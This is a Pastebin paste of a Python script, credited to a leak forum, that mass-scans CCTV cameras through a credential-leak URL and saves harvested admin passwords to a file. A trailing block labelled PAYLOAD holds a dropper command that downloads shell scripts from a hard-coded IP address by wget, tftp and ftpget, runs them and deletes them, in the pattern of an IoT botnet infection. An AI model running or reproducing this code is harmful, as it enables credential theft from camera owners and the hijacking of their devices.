Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # Bruteforce tool for CCTV RCE Exploit
- # Usage: python3 dumper.py 1000
- # Credz to Cam | http://leakedfiles.org/forums/showthread.php?tid=10
- import urllib.request, threading, socket, time, sys
- if len(sys.argv) != 2:
- print("Correct useage: python " + sys.argv[0].split("\\").pop() + " <thread count> ")
- sys.exit()
- lock, finalprintout, timeout, creds, threads, threadcount, leak, total = threading.Lock(), "", 5, [], [], int(sys.argv[1]), "http://TARGET/system.ini?loginuse&loginpas", 0
- # Open output.txt
- list = open("output.txt", "r")
- scan = list.read()
- list.close()
- scan = scan.split("\n")
- while "\n" in scan:
- scan.remove("\n")
- pretotal = len(scan)
- def dumpcreds():
- global finalprintout
- global total
- global scan
- while len(scan) > 0:
- try:
- with lock:
- ip = scan.pop()
- with urllib.request.urlopen(leak.replace("TARGET", ip), None, timeout) as response:
- reply = str(response.read())
- if reply.find("admin") != -1:
- reply = reply[reply.find("admin"):]
- while reply.find("\\x00") != -1:
- reply = reply.replace("\\x00", "")
- password = reply[5:reply.find("\\")]
- if password.find("/") != -1:
- password = password[:password.find("/")]
- print("\x1b[0;37m[\x1b[0;35m*\x1b[0;37m] |\x1b[0;35mFound\x1b[0;37m| admin:" + password + "@" + ip)
- with lock:
- finalprintout += ip + ":admin:" + password + "\n"
- total += 1
- except:
- pass
- print(" \x1b[1;37m[\x1b[1;35m+\x1b[1;37m] \x1b[1;35mCCTV Camera Exploit \x1b[1;37m[\x1b[1;35m+\x1b[1;37m]\x1b[0m")
- print(" \x1b[1;37m[\x1b[1;31m*\x1b[1;37m] \x1b[1;36mCredits go to ★Cam★ \x1b[1;37m[\x1b[1;31m*\x1b[1;37m]")
- time.sleep(6)
- print(" \x1b[1;35mDumping Credentials, please wait")
- time.sleep(4)
- for i in range(0, threadcount+1):
- threads.append(threading.Thread(target=dumpcreds))
- for thread in threads:
- try:
- thread.daemon = True
- thread.start()
- except:
- pass
- for thread in threads:
- try:
- thread.join()
- except:
- pass
- while 1:
- time.sleep(1)
- done = False
- for thread in threads:
- if thread.isAlive() == True:
- done = False
- break
- else:
- done = True
- if done == True:
- writingit = open("vuln.txt", "w")
- writingit.write(finalprintout)
- writingit.close()
- print(str(total) + " of out " + str(pretotal) + " credentials dumped, " + str(int(100 / pretotal * total)) + "% success rate. ")
- break
- """
- PAYLOAD
- cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://21 7.61.18.235/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 217.61.18.235 -c get tf tp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 217.61.18.235; chmo d 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 217.61.18 .235 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -
- """
Add Comment
Please, Sign In to add comment